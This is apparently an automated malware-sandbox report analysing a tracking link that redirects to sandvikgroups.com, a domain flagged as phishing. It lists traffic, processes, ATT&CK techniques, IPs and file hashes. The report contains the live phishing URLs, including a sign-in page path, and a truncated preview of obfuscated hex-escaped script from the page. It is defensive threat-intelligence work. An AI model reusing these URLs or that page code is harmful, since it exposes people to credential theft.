    Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
    Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
    Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
    Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
    Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
    Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49923
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49922
    Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
    Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
    Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
    Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49917
    Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49915
    Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
    Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
    Source: unknownNetwork traffic detected: HTTP traffic on port 49923 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
    Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49917 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
    Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
    Source: unknownNetwork traffic detected: HTTP traffic on port 49888 -> 443
    Source: classification engineClassification label: mal60.phis.win@20/19@24/11
    Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2312 --field-trial-handle=2240,i,15377954421907004897,9575579198436454196,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
    Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://juddshaw.acemlnc.com/lt.php?x=3DZy~GE4V3Sh78B__Q9GUuBs1XzUv_D1ke04YXLDKXmbEs370Ey.yuJz5X6lmNI~jusw"
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2312 --field-trial-handle=2240,i,15377954421907004897,9575579198436454196,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
    Browser Extensions
    1
    Process Injection
    1
    Process Injection
    OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
    Encrypted Channel
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
    Non-Application Layer Protocol
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
    Application Layer Protocol
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
    Ingress Tool Transfer
    Traffic DuplicationData Destruction
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    https://juddshaw.acemlnc.com/lt.php?x=3DZy~GE4V3Sh78B__Q9GUuBs1XzUv_D1ke04YXLDKXmbEs370Ey.yuJz5X6lmNI~jusw0%Avira URL Cloudsafe
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    https://sandvikgroups.com/?get_link=ch_files/lib/js/jquery-3.3.1.min.js0%Avira URL Cloudsafe
    https://sandvikgroups.com/?get_link=ch_files/lib/pics/favi.ico0%Avira URL Cloudsafe
    https://sandvikgroups.com/?get_link=ch_files/pics/1024_bg.jpg0%Avira URL Cloudsafe
    https://sandvikgroups.com/cdn-cgi/challenge-platform/h/g/flow/ov1/397843571:1736281603:ect8I6OU7F0koaDox1VrDHVsHkABB-y9YHkkrx60-68/8fe6e8a6e884443e/58_S4_P7D1bxAd7lrVVuyth7KNXgXFASaYVEZk8veLM-1736283956-1.2.1.1-0wbzDXCv9bibZZn4V5b_DjzZwQbfCQlppZo.InrmlaniOPny2OjSbFRdAn9E2dld0%Avira URL Cloudsafe
    https://sandvikgroups.com/cdn-cgi/challenge-platform/h/g/scripts/jsd/849bfe45bf45/main.js?0%Avira URL Cloudsafe
    https://sandvikgroups.com/?get_link=ch_files/pics/white_logo.svg0%Avira URL Cloudsafe
    https://sandvikgroups.com/?get_link=ch_files/fonts/lighter_font.woff0%Avira URL Cloudsafe
    https://sandvikgroups.com/cdn-cgi/challenge-platform/scripts/jsd/main.js0%Avira URL Cloudsafe
    https://juddshaw.activehosted.com/lt.php?x=3DZy~GE4V3Sh78B__Q9GUuBs1XzUv_D1ke04YXLDKXmbEs370Ey.yuJz5X6lmNI~jusw0%Avira URL Cloudsafe
    https://sandvikgroups.com/favicon.ico0%Avira URL Cloudsafe
    https://sandvikgroups.com/?get_link=ch_files/ca/csspage2.php?page=signin&t=qrd0fg2hx9ez7rr0%Avira URL Cloudsafe
    https://sandvikgroups.com/cdn-cgi/challenge-platform/h/g/orchestrate/chl_page/v1?ray=8fe6e8a6e884443e0%Avira URL Cloudsafe
    https://sandvikgroups.com/cdn-cgi/challenge-platform/h/g/jsd/r/8fe6e9464fad422f0%Avira URL Cloudsafe
    NameIPActiveMaliciousAntivirus DetectionReputation
    a.nel.cloudflare.com
    35.190.80.1
    truefalse
      high
      cdnjs.cloudflare.com
      104.17.25.14
      truefalse
        high
        challenges.cloudflare.com
        104.18.95.41
        truefalse
          high
          www.google.com
          142.250.184.228
          truefalse
            high
            sandvikgroups.com
            188.114.96.3
            truetrue
              unknown
              juddshaw.activehosted.com
              104.17.203.31
              truefalse
                unknown
                juddshaw.acemlnc.com
                54.225.69.136
                truefalse
                  unknown
                  NameMaliciousAntivirus DetectionReputation
                  https://sandvikgroups.com/?get_link=ch_files/fonts/lighter_font.wofffalse
                  • Avira URL Cloud: safe
                  unknown
                  https://sandvikgroups.com/?get_link=ch_files/lib/pics/favi.icofalse
                  • Avira URL Cloud: safe
                  unknown
                  https://a.nel.cloudflare.com/report/v4?s=Pcg0o7Kj%2BRkdhhdLWX7U%2FtWVUL0wE8V1fG%2B7rp0VJrVdm01Fx%2BDD3F%2BiEeMtvmJ7tS8NOzIvP7o699TKmJFcbU7fjLyDKyfbHddhSmuvPjvQ5MYJj7BnZZuHIAMRVv7NzbE%2FpA%3D%3Dfalse
                    high
                    https://sandvikgroups.com/?get_link=ch_files/lib/js/jquery-3.3.1.min.jsfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://sandvikgroups.com/?get_link=ch_files/pics/1024_bg.jpgfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://sandvikgroups.com/?get_link=ch_files/pics/white_logo.svgfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://a.nel.cloudflare.com/report/v4?s=c49IWze7srcYuJx6lyP0XuSm1SoJSQOGSkg1s58FHgcYGeHWjPKHQBO%2F6%2B5mgLUBau%2F2c%2FJBavvtAfbkGsxgpGiT89iig3SK5oa%2FlpAZ%2FwhuL7BhqcUcj8fUCcj05pzZcJO7sw%3D%3Dfalse
                      high
                      https://sandvikgroups.com/?auth&apitoken=qrd0fg2hx9ez7rrtrue
                        unknown
                        https://juddshaw.activehosted.com/lt.php?x=3DZy~GE4V3Sh78B__Q9GUuBs1XzUv_D1ke04YXLDKXmbEs370Ey.yuJz5X6lmNI~juswfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://sandvikgroups.com/cdn-cgi/challenge-platform/h/g/scripts/jsd/849bfe45bf45/main.js?false
                        • Avira URL Cloud: safe
                        unknown
                        https://sandvikgroups.com/cdn-cgi/challenge-platform/h/g/flow/ov1/397843571:1736281603:ect8I6OU7F0koaDox1VrDHVsHkABB-y9YHkkrx60-68/8fe6e8a6e884443e/58_S4_P7D1bxAd7lrVVuyth7KNXgXFASaYVEZk8veLM-1736283956-1.2.1.1-0wbzDXCv9bibZZn4V5b_DjzZwQbfCQlppZo.InrmlaniOPny2OjSbFRdAn9E2dldfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://sandvikgroups.com/favicon.icofalse
                        • Avira URL Cloud: safe
                        unknown
                        https://sandvikgroups.com/cdn-cgi/challenge-platform/scripts/jsd/main.jsfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://sandvikgroups.com/?get_link=ch_files/ca/csspage2.php?page=signin&t=qrd0fg2hx9ez7rrfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://sandvikgroups.com/cdn-cgi/challenge-platform/h/g/orchestrate/chl_page/v1?ray=8fe6e8a6e884443efalse
                        • Avira URL Cloud: safe
                        unknown
                        https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/cmg/1false
                          high
                          https://sandvikgroups.com/?conotrue
                            unknown
                            https://sandvikgroups.com/cdn-cgi/challenge-platform/h/g/jsd/r/8fe6e9464fad422ffalse
                            • Avira URL Cloud: safe
                            unknown
                            https://juddshaw.acemlnc.com/lt.php?x=3DZy~GE4V3Sh78B__Q9GUuBs1XzUv_D1ke04YXLDKXmbEs370Ey.yuJz5X6lmNI~juswfalse
                              unknown
                              https://cdnjs.cloudflare.com/ajax/libs/modernizr/2.8.3/modernizr.min.jsfalse
                                high
                                https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/q622a/0x4AAAAAAAAjq6WYeRDKmebM/light/fbE/normal/auto/false
                                  high
                                  https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/i/8fe6e8bcbdc57d11/1736283961788/nEvdn7auSgI5cmyfalse
                                    high
                                    https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8fe6e8bcbdc57d11&lang=autofalse
                                      high
                                      https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/pat/8fe6e8bcbdc57d11/1736283961787/b7fe36ccacf88b8ba6160e9ac00363e293e2fd6784516cecc5ed9fccfb35fccf/gBU2stsMjJYtGBVfalse
                                        high
                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs
                                        IPDomainCountryFlagASNASN NameMalicious
                                        104.18.94.41
                                        unknownUnited States
                                        13335CLOUDFLARENETUSfalse
                                        104.18.95.41
                                        challenges.cloudflare.comUnited States
                                        13335CLOUDFLARENETUSfalse
                                        54.225.69.136
                                        juddshaw.acemlnc.comUnited States
                                        14618AMAZON-AESUSfalse
                                        239.255.255.250
                                        unknownReserved
                                        unknownunknownfalse
                                        188.114.97.3
                                        unknownEuropean Union
                                        13335CLOUDFLARENETUSfalse
                                        104.17.203.31
                                        juddshaw.activehosted.comUnited States
                                        13335CLOUDFLARENETUSfalse
                                        188.114.96.3
                                        sandvikgroups.comEuropean Union
                                        13335CLOUDFLARENETUStrue
                                        35.190.80.1
                                        a.nel.cloudflare.comUnited States
                                        15169GOOGLEUSfalse
                                        142.250.184.228
                                        www.google.comUnited States
                                        15169GOOGLEUSfalse
                                        104.17.25.14
                                        cdnjs.cloudflare.comUnited States
                                        13335CLOUDFLARENETUSfalse
                                        IP
                                        192.168.2.4
                                        Joe Sandbox version:41.0.0 Charoite
                                        Analysis ID:1585596
                                        Start date and time:2025-01-07 22:04:49 +01:00
                                        Joe Sandbox product:CloudBasic
                                        Overall analysis duration:0h 3m 1s
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Cookbook file name:browseurl.jbs
                                        Sample URL:https://juddshaw.acemlnc.com/lt.php?x=3DZy~GE4V3Sh78B__Q9GUuBs1XzUv_D1ke04YXLDKXmbEs370Ey.yuJz5X6lmNI~jusw
                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                        Number of analysed new started processes analysed:8
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:0
                                        Technologies:
                                        • EGA enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Detection:MAL
                                        Classification:mal60.phis.win@20/19@24/11
                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                        • Excluded IPs from analysis (whitelisted): 66.102.1.84, 216.58.206.46, 142.250.186.67, 172.217.23.110, 142.250.185.238, 216.58.206.78, 199.232.210.172, 192.229.221.95, 142.250.186.174, 142.250.185.234, 142.250.185.106, 142.250.181.234, 142.250.184.202, 142.250.185.138, 142.250.186.74, 142.250.185.170, 142.250.186.106, 142.250.185.202, 142.250.186.42, 142.250.186.170, 142.250.74.202, 142.250.186.138, 216.58.206.42, 172.217.16.202, 172.217.18.10, 142.250.185.174, 172.217.18.110, 142.250.185.227, 142.250.181.238, 142.250.185.142, 184.28.90.27, 20.12.23.50, 13.107.246.45
                                        • Excluded domains from analysis (whitelisted): fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, redirector.gvt1.com, update.googleapis.com, clients.l.google.com
                                        • Not all processes where analyzed, report is missing behavior information
                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                        • VT rate limit hit for: https://juddshaw.acemlnc.com/lt.php?x=3DZy~GE4V3Sh78B__Q9GUuBs1XzUv_D1ke04YXLDKXmbEs370Ey.yuJz5X6lmNI~jusw
                                        No simulations
                                        No context
                                        No context
                                        No context
                                        No context
                                        No context
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:HTML document, ASCII text, with very long lines (17581)
                                        Category:downloaded
                                        Size (bytes):19015
                                        Entropy (8bit):3.729367139193458
                                        Encrypted:false
                                        SSDEEP:96:r6o1Z1vAOAuQn5+uZ9ibmFp4cpgPnmtF7Bj92y72Z73HlhAwwZB9jS7NBPElQBPa:rFWOA14ngolh7YUPuc4Anx/m
                                        MD5:8BFDD6BE500DF6C9018FABE74F7AFDFF
                                        SHA1:7C734C0ACFB4D8DC488744AAABABF099438FD90A
                                        SHA-256:765EF8DF8776385739C278856B9428EB9D67EA1DF267670CCA157F2254EAE66E
                                        SHA-512:FB4FB5C229A1B6EC3842DF90B9B8F2A8BEAF74D8F80DDB011776778E6736EAAE0A6C5A43B5CDAC53CE496F91B0613DCC157A0854F55EC22C224C10725C33832F
                                        Malicious:false
                                        Reputation:low
                                        URL:https://sandvikgroups.com/?cono
                                        Preview:<!DOCTYPE html>.<html>.<head>.<meta charset="utf-8" />.<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />.<meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" />.<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />.<meta name="robots" content="noindex, nofollow" />. Start: Ad code and script tags for header of page -->. End: Ad code and script tags for header of page -->.<script type="text/javascript" charset="utf-8" data-cfasync="false">eval(decodeURIComponent(escape('\x28\x66\x75\x6E\x63\x74\x69\x6F\x6E\x28\x29\x7B\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x76\x61\x72\x20\x61\x20\x3D\x20\x66\x75\x6E\x63\x74\x69\x6F\x6E\x28\x29\x20\x7B\x74\x72\x79\x7B\x72\x65\x74\x75\x72\x6E\x20\x21\x21\x77\x69\x6E\x64\x6F\x77\x2E\x61\x64\x64\x45\x76\x65\x6E\x74\x4C\x69\x73\x74\x65\x6E\x65\x72\x7D\x20\x63\x61\x74\x63\x68\x28\x65\x29\x20\x7B\x72\x65\x74\x75\x72\x6E\x20\x21\x31\x7D\x20\x7D\x2C\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x62\x20\x3
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:PNG image data, 60 x 71, 8-bit/color RGB, non-interlaced
                                        Category:dropped
                                        Size (bytes):61
                                        Entropy (8bit):4.035372245524404
                                        Encrypted:false
                                        SSDEEP:3:yionv//thPlE/KF/l6yxl/k4E08up:6v/lhPFN17Tp
                                        MD5:2A023FA4B4DB141746DA41C704DFE1C5
                                        SHA1:38C96C1F3F0B7BED087D3EEB7302A89BEDD5D589
                                        SHA-256:47504E6EA44702213ECCDB1A714701AF97BF3A45A27E1621DA4F701BB443948C
                                        SHA-512:229EBCA0EB7D44EEEB04F3639F11BEFBE1CD7CC2E849BBDC7DB806A61C773241DB567F42C2C070C8A1B067609EE0B27FCF8C0ED776C251627D497F1E58364FB0
                                        Malicious:false
                                        Reputation:low
                                        Preview:.PNG........IHDR...<...G......{.'....IDAT.....$.....IEND.B`.
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:downloaded
                                        Size (bytes):40
                                        Entropy (8bit):4.3464393446710154
                                        Encrypted:false
                                        SSDEEP:3:mSzAOt05cICkYn:mSzxKlCR
                                        MD5:3E4F77602E6C4A440AE88D1502781A83
                                        SHA1:D933F29BD993F8084565E7C33870751473F152C1
                                        SHA-256:3375E6FC0FBAA381ADCA29BAFD7466DECD2EEDB327D2D6367132627B49FDF59C
                                        SHA-512:FE8B9357D99100AF563A82EFD4B1AE343E7B692A650BE89C08CE7BBFEDFD6633CF1C8138D24C65F1B5C9F2335D964CFE30C567C7B19DE3F186493A3F0AA5A279
                                        Malicious:false
                                        Reputation:low
                                        URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISHgn23fsC8m1yZBIFDYUCXJYSBQ0KeNCaEgUNH-M_aQ==?alt=proto
                                        Preview:ChsKBw2FAlyWGgAKBw0KeNCaGgAKBw0f4z9pGgA=
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (8782), with no line terminators
                                        Category:dropped
                                        Size (bytes):8782
                                        Entropy (8bit):5.737639716811343
                                        Encrypted:false
                                        SSDEEP:192:k757iIaAz0olVWcdvg8iMaDdE/8KhQXSj5WlSrc:uX71Hvg87aR7Kh8Sj54ec
                                        MD5:62D3BA09165E606B00F940184C23CB0C
                                        SHA1:CC801BB9FFB1D6EE127FB844481B22153009088A
                                        SHA-256:4F216776E2D490A327FB4536415F5EBAB6703F4FDA388BCF17D10247FCEE9A36
                                        SHA-512:949BDB6009C6A655A5E0AA6415712A3BE9085716567DC4FCE4DDDAD7BB5C090A1FFBAD206BB85CFDEBC25A598B69C14FD350F96DE3E0BD977D341E7E0780322E
                                        Malicious:false
                                        Reputation:low
                                        Preview:window._cf_chl_opt={cFPWv:'g'};~function(W,h,i,j,k,o,s,x){W=b,function(d,e,V,f,g){for(V=b,f=d();!![];)try{if(g=-parseInt(V(448))/1*(-parseInt(V(415))/2)+parseInt(V(517))/3*(-parseInt(V(499))/4)+parseInt(V(509))/5+parseInt(V(475))/6*(parseInt(V(511))/7)+parseInt(V(423))/8+parseInt(V(426))/9*(-parseInt(V(486))/10)+-parseInt(V(507))/11,e===g)break;else f.push(f.shift())}catch(E){f.push(f.shift())}}(a,114287),h=this||self,i=h[W(431)],j={},j[W(526)]='o',j[W(469)]='s',j[W(473)]='u',j[W(489)]='z',j[W(476)]='n',j[W(420)]='I',j[W(455)]='b',k=j,h[W(452)]=function(g,E,F,G,a1,I,J,K,L,M,N){if(a1=W,E===null||E===void 0)return G;for(I=n(E),g[a1(472)][a1(465)]&&(I=I[a1(418)](g[a1(472)][a1(465)](E))),I=g[a1(470)][a1(467)]&&g[a1(445)]?g[a1(470)][a1(467)](new g[(a1(445))](I)):function(O,a2,P){for(a2=a1,O[a2(447)](),P=0;P<O[a2(506)];O[P+1]===O[P]?O[a2(515)](P+1,1):P+=1);return O}(I),J='nAsAaAb'.split('A'),J=J[a1(438)][a1(427)](J),K=0;K<I[a1(506)];L=I[K],M=m(g,E,L),J(M)?(N=M==='s'&&!g[a1(479)](E[L]),a1(493
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:PNG image data, 60 x 71, 8-bit/color RGB, non-interlaced
                                        Category:downloaded
                                        Size (bytes):61
                                        Entropy (8bit):4.035372245524404
                                        Encrypted:false
                                        SSDEEP:3:yionv//thPlE/KF/l6yxl/k4E08up:6v/lhPFN17Tp
                                        MD5:2A023FA4B4DB141746DA41C704DFE1C5
                                        SHA1:38C96C1F3F0B7BED087D3EEB7302A89BEDD5D589
                                        SHA-256:47504E6EA44702213ECCDB1A714701AF97BF3A45A27E1621DA4F701BB443948C
                                        SHA-512:229EBCA0EB7D44EEEB04F3639F11BEFBE1CD7CC2E849BBDC7DB806A61C773241DB567F42C2C070C8A1B067609EE0B27FCF8C0ED776C251627D497F1E58364FB0
                                        Malicious:false
                                        Reputation:low
                                        URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/i/8fe6e8bcbdc57d11/1736283961788/nEvdn7auSgI5cmy
                                        Preview:.PNG........IHDR...<...G......{.'....IDAT.....$.....IEND.B`.
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (8721), with no line terminators
                                        Category:downloaded
                                        Size (bytes):8721
                                        Entropy (8bit):5.737243200979716
                                        Encrypted:false
                                        SSDEEP:192:ksFyrclFZXrjYnZkneOxPt/SpD8PPfa788geK0kAZ:kzGjOZ2P0pDgaIVeFkM
                                        MD5:607A0AD13B692A7E890EEEA63BE6F5EA
                                        SHA1:30F48832266F5B30910FD5D0943AAEBC52206747
                                        SHA-256:42AF8E2A128D8AA99A30AC529FAA9096EC291CED7C471D0008D195A11A3F5505
                                        SHA-512:0E613A0B44F8B71EFF03F04C0034C616B8E78C68AF2F43D4134DE5B781D7A91D6ACEF700554C6F23FB0843F9C9AB77AA16C384BC61170A6C282979A1E1BBA251
                                        Malicious:false
                                        Reputation:low
                                        URL:https://sandvikgroups.com/cdn-cgi/challenge-platform/h/g/scripts/jsd/849bfe45bf45/main.js?
